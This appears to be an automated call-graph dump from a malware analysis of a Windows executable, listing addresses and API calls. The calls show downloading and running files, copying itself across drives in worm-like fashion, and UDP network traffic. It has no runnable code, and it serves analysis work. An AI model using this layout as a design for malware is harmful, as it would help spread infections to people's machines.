4555->4556 4562 40d8b0 4555->4562 4556->4464 4557 40d8c9 EnterCriticalSection 4557->4562 4558 40d937 LeaveCriticalSection 4560 40d94e 4558->4560 4558->4562 4559 40d913 WaitForSingleObject 4559->4562 4560->4556 4561 40d96c Sleep 4561->4562 4562->4556 4562->4557 4562->4558 4562->4559 4562->4560 4562->4561 4564 40da22 4563->4564 4565 40d9ac EnterCriticalSection 4563->4565 4564->4443 4566 40d9c8 4565->4566 4567 40d9f0 LeaveCriticalSection DeleteCriticalSection 4566->4567 4568 40d9db CloseHandle 4566->4568 4569 40a740 _invalid_parameter 3 API calls 4567->4569 4568->4566 4570 40da16 4569->4570 4571 40a740 _invalid_parameter 3 API calls 4570->4571 4571->4564 4575 40c980 4572->4575 4576 40c9b3 4575->4576 4577 40c99e 4575->4577 4579 407ef7 4576->4579 4607 40cb60 4576->4607 4581 40c9e0 4577->4581 4579->4441 4579->4443 4582 40ca09 4581->4582 4584 40ca92 4581->4584 4583 40ca8a 4582->4583 4641 40a320 4582->4641 4583->4579 4584->4583 4586 40a320 7 API calls 4584->4586 4588 40cab8 4586->4588 4588->4583 4590 402420 7 API calls 4588->4590 4592 40cae5 4590->4592 4594 4024e0 10 API calls 4592->4594 4596 40caff 4594->4596 4595 40ca5f 4597 402420 7 API calls 4595->4597 4598 402420 7 API calls 4596->4598 4599 40ca70 4597->4599 4600 40cb10 4598->4600 4601 4024e0 10 API calls 4599->4601 4602 4024e0 10 API calls 4600->4602 4601->4583 4603 40cb2a 4602->4603 4604 402420 7 API calls 4603->4604 4605 40cb3b 4604->4605 4606 4024e0 10 API calls 4605->4606 4606->4583 4608 40cb89 4607->4608 4609 40cc3a 4607->4609 4610 40a320 7 API calls 4608->4610 4640 40cc32 4608->4640 4611 40a320 7 API calls 4609->4611 4609->4640 4612 40cb9f 4610->4612 4614 40cc5e 4611->4614 4613 402420 7 API calls 4612->4613 4612->4640 4615 40cbc3 4613->4615 4616 402420 7 API calls 4614->4616 4614->4640 4617 40a320 7 API calls 4615->4617 4618 40cc82 4616->4618 4619 40cbd2 4617->4619 4620 40a320 7 API calls 4618->4620 4621 4024e0 10 API calls 4619->4621 4622 40cc91 4620->4622 4623 40cbfb 4621->4623 4624 4024e0 10 API calls 
4622->4624 4625 40a740 _invalid_parameter 3 API calls 4623->4625 4626 40ccba 4624->4626 4627 40cc07 4625->4627 4628 40a740 _invalid_parameter 3 API calls 4626->4628 4629 402420 7 API calls 4627->4629 4630 40ccc6 4628->4630 4631 40cc18 4629->4631 4632 402420 7 API calls 4630->4632 4633 4024e0 10 API calls 4631->4633 4634 40ccd7 4632->4634 4633->4640 4635 4024e0 10 API calls 4634->4635 4636 40ccf1 4635->4636 4637 402420 7 API calls 4636->4637 4638 40cd02 4637->4638 4639 4024e0 10 API calls 4638->4639 4639->4640 4640->4579 4652 40a340 4641->4652 4644 402420 4673 40a530 4644->4673 4649 4024e0 4680 402540 4649->4680 4651 4024ff __aligned_recalloc_base 4651->4595 4661 40a3e0 GetCurrentProcessId 4652->4661 4654 40a34b 4657 40a357 __aligned_recalloc_base 4654->4657 4662 40a400 4654->4662 4656 40a32e 4656->4583 4656->4644 4657->4656 4658 40a372 HeapAlloc 4657->4658 4658->4656 4659 40a399 __aligned_recalloc_base 4658->4659 4659->4656 4660 40a3b4 memset 4659->4660 4660->4656 4661->4654 4670 40a3e0 GetCurrentProcessId 4662->4670 4664 40a409 4665 40a426 HeapCreate 4664->4665 4671 40a470 GetProcessHeaps 4664->4671 4667 40a440 HeapSetInformation GetCurrentProcessId 4665->4667 4668 40a467 4665->4668 4667->4668 4668->4657 4670->4664 4672 40a41c 4671->4672 4672->4665 4672->4668 4674 40a340 __aligned_recalloc_base 7 API calls 4673->4674 4675 40242b 4674->4675 4676 402820 4675->4676 4677 40282a 4676->4677 4678 40a530 __aligned_recalloc_base 7 API calls 4677->4678 4679 402438 4678->4679 4679->4649 4681 40258e 4680->4681 4682 402551 4680->4682 4681->4682 4683 40a530 __aligned_recalloc_base 7 API calls 4681->4683 4682->4651 4686 4025b2 _invalid_parameter 4683->4686 4684 4025e2 memcpy 4685 402606 _invalid_parameter 4684->4685 4687 40a740 _invalid_parameter 3 API calls 4685->4687 4686->4684 4690 40a740 4686->4690 4687->4682 4697 40a3e0 GetCurrentProcessId 4690->4697 4692 40a74b 4693 4025df 4692->4693 4698 40a680 4692->4698 4693->4684 4696 40a767 HeapFree 4696->4693 4697->4692 4699 40a6b0 
HeapValidate 4698->4699 4700 40a6d0 4698->4700 4699->4700 4700->4693 4700->4696 4718 40a7b0 4701->4718 4704 40cdf1 4704->4487 4707 40a740 _invalid_parameter 3 API calls 4707->4704 4931 40a570 4708->4931 4711 405cca memcpy 4713 40a7b0 8 API calls 4711->4713 4712 405d88 4712->4487 4714 405d01 4713->4714 4941 40c720 4714->4941 4719 40a7dd 4718->4719 4720 40a530 __aligned_recalloc_base 7 API calls 4719->4720 4721 40a7f2 4719->4721 4722 40a7f4 memcpy 4719->4722 4720->4719 4721->4704 4723 40c2c0 4721->4723 4722->4719 4727 40c2ca 4723->4727 4725 40c2e9 4725->4704 4725->4707 4727->4725 4728 40c301 memcmp 4727->4728 4729 40c328 4727->4729 4731 40a740 _invalid_parameter 3 API calls 4727->4731 4732 40c7b0 4727->4732 4746 408080 4727->4746 4728->4727 4730 40a740 _invalid_parameter 3 API calls 4729->4730 4730->4725 4731->4727 4733 40c7bf __aligned_recalloc_base 4732->4733 4734 40a530 __aligned_recalloc_base 7 API calls 4733->4734 4745 40c7c9 4733->4745 4735 40c858 4734->4735 4736 402420 7 API calls 4735->4736 4735->4745 4737 40c86d 4736->4737 4738 402420 7 API calls 4737->4738 4739 40c875 4738->4739 4741 40c8cd __aligned_recalloc_base 4739->4741 4749 40c920 4739->4749 4754 402470 4741->4754 4744 402470 3 API calls 4744->4745 4745->4727 4862 40a2a0 4746->4862 4750 4024e0 10 API calls 4749->4750 4751 40c934 4750->4751 4760 4026f0 4751->4760 4753 40c94c 4753->4739 4755 4024ce 4754->4755 4757 402484 _invalid_parameter 4754->4757 4755->4744 4756 40a740 _invalid_parameter 3 API calls 4756->4755 4758 40a740 _invalid_parameter 3 API calls 4757->4758 4759 4024ac 4757->4759 4758->4759 4759->4756 4763 402710 4760->4763 4762 40270a 4762->4753 4764 402724 4763->4764 4765 402540 __aligned_recalloc_base 10 API calls 4764->4765 4766 40276d 4765->4766 4767 402540 __aligned_recalloc_base 10 API calls 4766->4767 4768 40277d 4767->4768 4769 402540 __aligned_recalloc_base 10 API calls 4768->4769 4770 40278d 4769->4770 4771 402540 __aligned_recalloc_base 10 API calls 4770->4771 4772 40279d 
4771->4772 4773 4027a6 4772->4773 4774 4027cf 4772->4774 4778 403e20 4773->4778 4795 403df0 4774->4795 4777 4027c7 __aligned_recalloc_base 4777->4762 4779 402820 _invalid_parameter 7 API calls 4778->4779 4780 403e37 4779->4780 4781 402820 _invalid_parameter 7 API calls 4780->4781 4782 403e46 4781->4782 4783 402820 _invalid_parameter 7 API calls 4782->4783 4784 403e55 4783->4784 4785 402820 _invalid_parameter 7 API calls 4784->4785 4794 403e64 _invalid_parameter __aligned_recalloc_base 4785->4794 4787 40400f _invalid_parameter 4788 402850 _invalid_parameter 3 API calls 4787->4788 4789 404035 _invalid_parameter 4787->4789 4788->4787 4790 402850 _invalid_parameter 3 API calls 4789->4790 4791 40405b _invalid_parameter 4789->4791 4790->4789 4792 402850 _invalid_parameter 3 API calls 4791->4792 4793 404081 4791->4793 4792->4791 4793->4777 4794->4787 4798 402850 4794->4798 4802 404090 4795->4802 4797 403e0c 4797->4777 4799 40285b 4798->4799 4801 402866 4798->4801 4800 40a740 _invalid_parameter 3 API calls 4799->4800 4800->4801 4801->4794 4803 4040a6 _invalid_parameter 4802->4803 4804 4040b8 _invalid_parameter 4803->4804 4805 4040dd 4803->4805 4807 404103 4803->4807 4804->4797 4832 403ca0 4805->4832 4808 40413d 4807->4808 4809 40415e 4807->4809 4842 404680 4808->4842 4811 402820 _invalid_parameter 7 API calls 4809->4811 4812 40416f 4811->4812 4813 402820 _invalid_parameter 7 API calls 4812->4813 4814 40417e 4813->4814 4815 402820 _invalid_parameter 7 API calls 4814->4815 4816 40418d 4815->4816 4817 402820 _invalid_parameter 7 API calls 4816->4817 4818 40419c 4817->4818 4855 403d70 4818->4855 4820 402820 _invalid_parameter 7 API calls 4821 4041ca _invalid_parameter 4820->4821 4821->4820 4823 404284 _invalid_parameter __aligned_recalloc_base 4821->4823 4822 402850 _invalid_parameter 3 API calls 4822->4823 4823->4822 4824 4045a3 _invalid_parameter 4823->4824 4825 402850 _invalid_parameter 3 API calls 4824->4825 4826 4045c9 _invalid_parameter 4824->4826 4825->4824 4827 402850 
_invalid_parameter 3 API calls 4826->4827 4828 4045ef _invalid_parameter 4826->4828 4827->4826 4829 402850 _invalid_parameter 3 API calls 4828->4829 4830 404615 _invalid_parameter 4828->4830 4829->4828 4830->4804 4831 402850 _invalid_parameter 3 API calls 4830->4831 4831->4830 4833 403cae 4832->4833 4834 402820 _invalid_parameter 7 API calls 4833->4834 4835 403ccb 4834->4835 4836 402820 _invalid_parameter 7 API calls 4835->4836 4838 403cda _invalid_parameter 4836->4838 4837 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4837->4838 4838->4837 4839 403d3a _invalid_parameter 4838->4839 4840 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4839->4840 4841 403d60 4839->4841 4840->4839 4841->4804 4843 402820 _invalid_parameter 7 API calls 4842->4843 4844 404697 4843->4844 4845 402820 _invalid_parameter 7 API calls 4844->4845 4846 4046a6 4845->4846 4847 402820 _invalid_parameter 7 API calls 4846->4847 4854 4046b5 _invalid_parameter __aligned_recalloc_base 4847->4854 4848 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4848->4854 4849 404841 _invalid_parameter 4850 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4849->4850 4851 404867 _invalid_parameter 4849->4851 4850->4849 4852 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4851->4852 4853 40488d 4851->4853 4852->4851 4853->4804 4854->4848 4854->4849 4856 402820 _invalid_parameter 7 API calls 4855->4856 4857 403d7f _invalid_parameter 4856->4857 4858 403ca0 _invalid_parameter 9 API calls 4857->4858 4860 403db8 _invalid_parameter 4858->4860 4859 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4859->4860 4860->4859 4861 403de3 4860->4861 4861->4821 4863 40a2b2 4862->4863 4866 40a200 4863->4866 4867 40a530 __aligned_recalloc_base 7 API calls 4866->4867 4874 40a210 4867->4874 4870 40a740 _invalid_parameter 3 API calls 4872 40809f 4870->4872 4871 40a24c 4871->4870 4872->4727 4874->4871 4874->4872 4875 409730 
4874->4875 4882 409d20 4874->4882 4887 40a0f0 4874->4887 4876 409739 4875->4876 4877 409743 4875->4877 4876->4874 4877->4876 4878 409786 memset 4877->4878 4878->4876 4879 4097a7 4878->4879 4879->4876 4880 4097ad memcpy 4879->4880 4895 409500 4880->4895 4883 409d37 4882->4883 4886 409d2d 4882->4886 4884 409e2f memcpy 4883->4884 4883->4886 4900 409a50 4883->4900 4884->4883 4886->4874 4889 40a106 4887->4889 4893 40a0fc 4887->4893 4888 409a50 64 API calls 4890 40a187 4888->4890 4889->4888 4889->4893 4891 409500 6 API calls 4890->4891 4890->4893 4892 40a1a6 4891->4892 4892->4893 4894 40a1bb memcpy 4892->4894 4893->4874 4894->4893 4896 40954e 4895->4896 4898 40950e 4895->4898 4896->4876 4898->4896 4899 409440 6 API calls 4898->4899 4899->4898 4902 409a6a 4900->4902 4904 409a60 4900->4904 4902->4904 4910 409890 4902->4910 4904->4883 4905 409ba8 memcpy 4905->4904 4907 409bc7 memcpy 4908 409cf1 4907->4908 4909 409a50 62 API calls 4908->4909 4909->4904 4911 40989d 4910->4911 4912 4098a7 4910->4912 4911->4904 4911->4905 4911->4907 4912->4911 4913 409930 4912->4913 4915 409935 4912->4915 4916 409918 4912->4916 4921 4091f0 4913->4921 4917 409500 6 API calls 4915->4917 4919 409500 6 API calls 4916->4919 4917->4913 4919->4913 4920 4099dc memset 4920->4911 4922 409209 4921->4922 4930 4091ff 4921->4930 4923 4090c0 9 API calls 4922->4923 4922->4930 4924 409302 4923->4924 4925 40a530 __aligned_recalloc_base 7 API calls 4924->4925 4926 409351 4925->4926 4927 408f30 46 API calls 4926->4927 4926->4930 4928 40937e 4927->4928 4929 40a740 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4928->4929 4929->4930 4930->4911 4930->4920 4950 40a3e0 GetCurrentProcessId 4931->4950 4933 40a57b 4934 40a400 __aligned_recalloc_base 5 API calls 4933->4934 4939 40a587 __aligned_recalloc_base 4933->4939 4934->4939 4935 405cb5 4935->4711 4935->4712 4936 40a680 _invalid_parameter HeapValidate 4936->4939 4937 40a630 HeapAlloc 4937->4939 4938 40a5fa HeapReAlloc 4938->4939 4939->4935 4939->4936 
4939->4937 4939->4938 4940 40a740 _invalid_parameter 3 API calls 4939->4940 4940->4939 4944 40c72b 4941->4944 4942 40a530 __aligned_recalloc_base 7 API calls 4942->4944 4943 405d4d 4943->4712 4945 4072a0 4943->4945 4944->4942 4944->4943 4946 40a530 __aligned_recalloc_base 7 API calls 4945->4946 4947 4072b0 4946->4947 4948 4072f7 4947->4948 4949 4072bc memcpy CreateThread CloseHandle 4947->4949 4948->4712 4949->4948 4951 407300 4949->4951 4950->4933 4952 407371 4951->4952 4960 407311 4951->4960 4953 40737c DeleteUrlCacheEntry 4952->4953 4954 40736f 4952->4954 4955 40f070 64 API calls 4953->4955 4956 40a740 _invalid_parameter 3 API calls 4954->4956 4955->4954 4958 4073a6 4956->4958 4957 407320 StrChrA 4959 407344 DeleteUrlCacheEntry 4957->4959 4957->4960 4963 40f070 9 API calls 4959->4963 4960->4954 4960->4957 4960->4959 4964 40f133 InternetOpenUrlW 4963->4964 4965 40f29e InternetCloseHandle Sleep 4963->4965 4966 40f291 InternetCloseHandle 4964->4966 4967 40f162 CreateFileW 4964->4967 4968 40f2c5 7 API calls 4965->4968 4969 407359 Sleep 4965->4969 4966->4965 4971 40f191 InternetReadFile 4967->4971 4972 40f284 CloseHandle 4967->4972 4968->4969 4970 40f354 wsprintfW DeleteFileW Sleep 4968->4970 4969->4960 4973 40ed50 21 API calls 4970->4973 4974 40f1e4 CloseHandle wsprintfW DeleteFileW Sleep 4971->4974 4975 40f1b5 4971->4975 4972->4966 4977 40f394 4973->4977 4991 40ed50 CreateFileW 4974->4991 4975->4974 4976 40f1be WriteFile 4975->4976 4976->4971 4979 40f3d2 DeleteFileW 4977->4979 4980 40f39e Sleep 4977->4980 4979->4969 4982 40ef10 6 API calls 4980->4982 4985 40f3b5 4982->4985 4983 40f277 DeleteFileW 4983->4972 4984 40f23b Sleep 4986 40ef10 6 API calls 4984->4986 4985->4969 4987 40f3c8 ExitProcess 4985->4987 4988 40f252 4986->4988 4989 40f266 ExitProcess 4988->4989 4990 40f26e 4988->4990 4990->4972 4992 40ed95 CreateFileMappingW 4991->4992 4993 40eeaa 4991->4993 4994 40eea0 CloseHandle 4992->4994 4995 40edb6 MapViewOfFile 4992->4995 4996 40eeb0 CreateFileW 4993->4996 
4997 40ef01 4993->4997 4994->4993 4998 40edd5 GetFileSize 4995->4998 4999 40ee96 CloseHandle 4995->4999 5000 40eed2 WriteFile CloseHandle 4996->5000 5001 40eef8 4996->5001 4997->4983 4997->4984 5002 40edf1 4998->5002 5003 40ee8c UnmapViewOfFile 4998->5003 4999->4994 5000->5001 5004 40a740 _invalid_parameter 3 API calls 5001->5004 5013 40cd80 5002->5013 5003->4999 5004->4997 5007 40c720 7 API calls 5008 40ee40 5007->5008 5008->5003 5009 40ee5d memcmp 5008->5009 5009->5003 5010 40ee79 5009->5010 5011 40a740 _invalid_parameter 3 API calls 5010->5011 5012 40ee82 5011->5012 5012->5003 5014 40c7b0 10 API calls 5013->5014 5015 40cda4 5014->5015 5015->5003 5015->5007 5017 40dccd htons inet_addr setsockopt 5016->5017 5023 40ddfe 5016->5023 5018 40b010 8 API calls 5017->5018 5019 40dd46 bind lstrlenA sendto ioctlsocket 5018->5019 5020 40dd9b 5019->5020 5024 40ddc2 5020->5024 5025 40a570 9 API calls 5020->5025 5064 40de20 5020->5064 5023->4493 5073 40b0d0 shutdown closesocket 5024->5073 5025->5020 5080 40e150 memset InternetCrackUrlA InternetOpenA 5026->5080 5029 40e02e 5029->4493 5031 40dffb 5032 40a740 _invalid_parameter 3 API calls 5031->5032 5032->5029 5038 40dff1 SysFreeString 5038->5031 5187 40afd0 inet_addr 5041->5187 5044 40b0bd 5049 40ea00 5044->5049 5045 40b06c connect 5046 40b080 getsockname 5045->5046 5047 40b0b4 5045->5047 5046->5047 5190 40b0d0 shutdown closesocket 5047->5190 5191 40afb0 inet_ntoa 5049->5191 5051 40ea16 5052 40cf80 11 API calls 5051->5052 5053 40ea35 5052->5053 5059 40dc5c 5053->5059 5192 40ea80 memset InternetCrackUrlA InternetOpenA 5053->5192 5056 40ea6c 5058 40a740 _invalid_parameter 3 API calls 5056->5058 5057 40a740 _invalid_parameter 3 API calls 5057->5056 5058->5059 5059->4502 5063 40a864 5060->5063 5061 40a86a 5061->4494 5062 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5062->5063 5063->5061 5063->5062 5065 40de3c 5064->5065 5066 40df04 5065->5066 5067 40de58 recvfrom 5065->5067 5066->5020 5068 40de86 StrCmpNIA 
5067->5068 5069 40de79 Sleep 5067->5069 5068->5065 5070 40dea5 StrStrIA 5068->5070 5069->5065 5070->5065 5071 40dec6 StrChrA 5070->5071 5074 40ce30 5071->5074 5073->5023 5076 40ce3b 5074->5076 5075 40ce41 lstrlenA 5075->5076 5077 40ce54 5075->5077 5076->5075 5076->5077 5078 40a530 __aligned_recalloc_base 7 API calls 5076->5078 5079 40ce70 memcpy 5076->5079 5077->5065 5078->5076 5079->5076 5079->5077 5081 40e1f1 InternetConnectA 5080->5081 5082 40df2a 5080->5082 5083 40e35a InternetCloseHandle 5081->5083 5084 40e22a HttpOpenRequestA 5081->5084 5082->5029 5093 40e040 5082->5093 5083->5082 5085 40e260 HttpSendRequestA 5084->5085 5086 40e34d InternetCloseHandle 5084->5086 5087 40e340 InternetCloseHandle 5085->5087 5090 40e27d 5085->5090 5086->5083 5087->5086 5088 40e2cb 5088->5087 5089 40e29e InternetReadFile 5089->5088 5089->5090 5090->5088 5090->5089 5091 40a570 9 API calls 5090->5091 5092 40e2e6 memcpy 5091->5092 5092->5090 5122 405630 5093->5122 5096 40e06a SysAllocString 5097 40e081 CoCreateInstance 5096->5097 5098 40e137 5096->5098 5100 40e12d SysFreeString 5097->5100 5102 40e0a6 5097->5102 5099 40a740 _invalid_parameter 3 API calls 5098->5099 5101 40df43 5099->5101 5100->5098 5101->5031 5103 40e9b0 5101->5103 5102->5100 5139 40e500 5103->5139 5106 40e380 5144 40e7d0 5106->5144 5111 40e930 6 API calls 5112 40e3d7 5111->5112 5118 40dfc2 5112->5118 5161 40e5f0 5112->5161 5115 40e40f 5115->5118 5166 40e4a0 5115->5166 5116 40e5f0 6 API calls 5116->5115 5118->5038 5119 40cf80 5118->5119 5182 40cef0 5119->5182 5123 40563d 5122->5123 5124 405643 lstrlenA 5123->5124 5126 40a530 __aligned_recalloc_base 7 API calls 5123->5126 5128 405656 5123->5128 5129 40a740 _invalid_parameter 3 API calls 5123->5129 5130 4055d0 5123->5130 5134 405580 5123->5134 5124->5123 5124->5128 5126->5123 5128->5096 5128->5101 5129->5123 5131 4055e7 MultiByteToWideChar 5130->5131 5132 4055da lstrlenA 5130->5132 5133 40560c 5131->5133 5132->5131 5133->5123 5135 40558b 5134->5135 5136 405591 lstrlenA 
5135->5136 5137 4055d0 2 API calls 5135->5137 5138 4055c7 5135->5138 5136->5135 5137->5135 5138->5123 5142 40e526 5139->5142 5140 40dfad 5140->5031 5140->5106 5141 40e5a3 lstrcmpiW 5141->5142 5143 40e5bb SysFreeString 5141->5143 5142->5140 5142->5141 5142->5143 5143->5142 5145 40e7f6 5144->5145 5146 40e39b 5145->5146 5147 40e883 lstrcmpiW 5145->5147 5146->5118 5156 40e930 5146->5156 5148 40e903 SysFreeString 5147->5148 5149 40e896 5147->5149 5148->5146 5150 40e4a0 2 API calls 5149->5150 5152 40e8a4 5150->5152 5151 40e8f5 5151->5148 5152->5148 5152->5151 5153 40e8d3 lstrcmpiW 5152->5153 5154 40e8e5 5153->5154 5155 40e8eb SysFreeString 5153->5155 5154->5155 5155->5151 5157 40e4a0 2 API calls 5156->5157 5159 40e94b 5157->5159 5158 40e3b9 5158->5111 5158->5118 5159->5158 5160 40e7d0 6 API calls 5159->5160 5160->5158 5162 40e4a0 2 API calls 5161->5162 5164 40e60b 5162->5164 5163 40e3f5 5163->5115 5163->5116 5164->5163 5170 40e670 5164->5170 5167 40e4c6 5166->5167 5168 40e4dd 5167->5168 5169 40e500 2 API calls 5167->5169 5168->5118 5169->5168 5171 40e696 5170->5171 5172 40e7ad 5171->5172 5173 40e723 lstrcmpiW 5171->5173 5172->5163 5174 40e7a3 SysFreeString 5173->5174 5175 40e736 5173->5175 5174->5172 5176 40e4a0 2 API calls 5175->5176 5178 40e744 5176->5178 5177 40e795 5177->5174 5178->5174 5178->5177 5179 40e773 lstrcmpiW 5178->5179 5180 40e785 5179->5180 5181 40e78b SysFreeString 5179->5181 5180->5181 5181->5177 5186 40cefd 5182->5186 5183 40cea0 _vscprintf wvsprintfA 5183->5186 5184 40cf18 SysFreeString 5184->5038 5185 40a570 9 API calls 5185->5186 5186->5183 5186->5184 5186->5185 5188 40affc socket 5187->5188 5189 40afe9 gethostbyname 5187->5189 5188->5044 5188->5045 5189->5188 5190->5044 5191->5051 5193 40ea57 5192->5193 5194 40eb24 InternetConnectA 5192->5194 5193->5056 5193->5057 5195 40eca4 InternetCloseHandle 5194->5195 5196 40eb5d HttpOpenRequestA 5194->5196 5195->5193 5197 40eb93 HttpAddRequestHeadersA HttpSendRequestA 5196->5197 5198 40ec97 
InternetCloseHandle 5196->5198 5199 40ec8a InternetCloseHandle 5197->5199 5202 40ebdd 5197->5202 5198->5195 5199->5198 5200 40ebf4 InternetReadFile 5201 40ec21 5200->5201 5200->5202 5201->5199 5202->5200 5202->5201 5203 40a570 9 API calls 5202->5203 5204 40ec3c memcpy 5203->5204 5204->5202 5210 406ff7 5205->5210 5206 4071cb 5208 4071d4 SysFreeString 5206->5208 5209 406f9b SysFreeString 5206->5209 5207 40a740 _invalid_parameter 3 API calls 5207->5206 5208->5209 5209->4506 5211 407250 CoCreateInstance 5210->5211 5212 407146 SysAllocString 5210->5212 5213 407012 5210->5213 5211->5210 5212->5210 5212->5213 5213->5206 5213->5207 5215 40c45a 5214->5215 5216 40c45e 5214->5216 5215->4512 5218 40c410 CryptAcquireContextW 5216->5218 5219 40c44b 5218->5219 5220 40c42d CryptGenRandom CryptReleaseContext 5218->5220 5219->5215 5220->5219 5221->4536 5273 40b360 gethostname 5222->5273 5225 40b449 5225->4536 5227 40b45c strcmp 5227->5225 5228 40b471 5227->5228 5277 40afb0 inet_ntoa 5228->5277 5230 40b47f strstr 5231 40b4d0 5230->5231 5232 40b48f 5230->5232 5280 40afb0 inet_ntoa 5231->5280 5278 40afb0 inet_ntoa 5232->5278 5235 40b49d strstr 5235->5225 5239 40b4ad 5235->5239 5236 40b4de strstr 5237 40b4ee 5236->5237 5238 40b52f 5236->5238 5281 40afb0 inet_ntoa 5237->5281 5283 40afb0 inet_ntoa 5238->5283 5279 40afb0 inet_ntoa 5239->5279 5243 40b4fc strstr 5243->5225 5246 40b50c 5243->5246 5244 40b53d strstr 5247 40b54d 5244->5247 5248 40b58e EnterCriticalSection 5244->5248 5245 40b4bb strstr 5245->5225 5245->5231 5282 40afb0 inet_ntoa 5246->5282 5284 40afb0 inet_ntoa 5247->5284 5249 40b5a6 5248->5249 5258 40b5d1 5249->5258 5286 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5249->5286 5252 40b51a strstr 5252->5225 5252->5238 5253 40b55b strstr 5253->5225 5254 40b56b 5253->5254 5285 40afb0 inet_ntoa 5254->5285 5257 40b6ca LeaveCriticalSection 5257->5225 5258->5257 5260 40a320 7 API calls 5258->5260 5259 40b579 strstr 5259->5225 5259->5248 5261 40b615 5260->5261 5261->5257 5287 
40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5261->5287 5263 40b633 5264 40b660 5263->5264 5265 40b656 Sleep 5263->5265 5267 40b685 5263->5267 5266 40a740 _invalid_parameter 3 API calls 5264->5266 5265->5263 5266->5267 5267->5257 5288 40b110 5267->5288 5269->4540 5271 40b110 14 API calls 5270->5271 5272 40b103 LeaveCriticalSection 5271->5272 5272->4532 5274 40b387 gethostbyname 5273->5274 5275 40b3a3 5273->5275 5274->5275 5275->5225 5276 40afb0 inet_ntoa 5275->5276 5276->5227 5277->5230 5278->5235 5279->5245 5280->5236 5281->5243 5282->5252 5283->5244 5284->5253 5285->5259 5286->5258 5287->5263 5289 40b124 5288->5289 5296 40b11f 5288->5296 5290 40a530 __aligned_recalloc_base 7 API calls 5289->5290 5291 40b138 5290->5291 5292 40b194 CreateFileW 5291->5292 5291->5296 5293 40b1e3 InterlockedExchange 5292->5293 5294 40b1b7 WriteFile FlushFileBuffers CloseHandle 5292->5294 5295 40a740 _invalid_parameter 3 API calls 5293->5295 5294->5293 5295->5296 5296->5257 5298 40d7ed 5297->5298 5299 40d723 5298->5299 5300 40d811 WaitForSingleObject 5298->5300 5299->4547 5299->4548 5300->5298 5301 40d82c CloseHandle 5300->5301 5301->5298 5307 407407 5302->5307 5303 4074e1 Sleep 5303->5307 5304 40742f Sleep 5304->5307 5305 40745e Sleep wsprintfA DeleteUrlCacheEntry 5332 40efc0 InternetOpenA 5305->5332 5307->5303 5307->5304 5307->5305 5308 40f070 64 API calls 5307->5308 5308->5307 5310 405829 memset GetModuleHandleW 5309->5310 5311 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5310->5311 5311->5311 5312 4058a0 CreateWindowExW 5311->5312 5313 4058cb 5312->5313 5314 4058cd GetMessageA 5312->5314 5315 4058ff ExitThread 5313->5315 5316 4058e1 TranslateMessage DispatchMessageA 5314->5316 5317 4058f7 5314->5317 5316->5314 5317->5310 5317->5315 5339 40ed00 CreateFileW 5318->5339 5320 406b80 5321 406cd8 ExitThread 5320->5321 5323 406cc8 Sleep 5320->5323 5324 406bb9 5320->5324 5342 406340 GetLogicalDrives 5320->5342 5323->5320 5348 406260 5324->5348 5327 406bf0 
GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5328 406c66 wsprintfW 5327->5328 5329 406c7b wsprintfW 5327->5329 5328->5329 5354 406650 _chkstk 5329->5354 5330 406beb 5333 40efe6 InternetOpenUrlA 5332->5333 5334 40f058 Sleep 5332->5334 5335 40f005 HttpQueryInfoA 5333->5335 5336 40f04e InternetCloseHandle 5333->5336 5334->5307 5337 40f044 InternetCloseHandle 5335->5337 5338 40f02e 5335->5338 5336->5334 5337->5336 5338->5337 5340 40ed48 5339->5340 5341 40ed2f GetFileSize CloseHandle 5339->5341 5340->5320 5341->5340 5345 40636d 5342->5345 5343 4063e6 5343->5320 5344 40637c RegOpenKeyExW 5344->5345 5346 40639e RegQueryValueExW 5344->5346 5345->5343 5345->5344 5347 4063da RegCloseKey 5345->5347 5346->5345 5346->5347 5347->5345 5349 4062b9 5348->5349 5350 40627c 5348->5350 5349->5327 5349->5330 5389 4062c0 GetDriveTypeW 5350->5389 5353 4062ab lstrcpyW 5353->5349 5355 406667 5354->5355 5356 40666e 6 API calls 5354->5356 5355->5330 5357 406722 5356->5357 5358 406764 PathFileExistsW 5356->5358 5359 40ed00 3 API calls 5357->5359 5360 406803 PathFileExistsW 5358->5360 5361 406779 SetFileAttributesW DeleteFileW PathFileExistsW 5358->5361 5366 40672e 5359->5366 5364 406814 5360->5364 5365 406859 FindFirstFileW 5360->5365 5362 4067a9 CreateDirectoryW 5361->5362 5363 4067cb PathFileExistsW 5361->5363 5362->5363 5367 4067bc SetFileAttributesW 5362->5367 5363->5360 5368 4067dc CopyFileW 5363->5368 5369 406834 5364->5369 5370 40681c 5364->5370 5365->5355 5387 406880 5365->5387 5366->5358 5371 406745 SetFileAttributesW DeleteFileW 5366->5371 5367->5363 5368->5360 5373 4067f4 SetFileAttributesW 5368->5373 5375 406400 3 API calls 5369->5375 5394 406400 CoInitialize CoCreateInstance 5370->5394 5371->5358 5372 406942 lstrcmpW 5376 406958 lstrcmpW 5372->5376 5372->5387 5373->5360 5377 40682f SetFileAttributesW 5375->5377 5376->5387 5377->5365 5378 406b19 FindNextFileW 5378->5372 5380 406b35 FindClose 5378->5380 5380->5355 5381 40699e lstrcmpiW 5381->5387 5382 406a05 
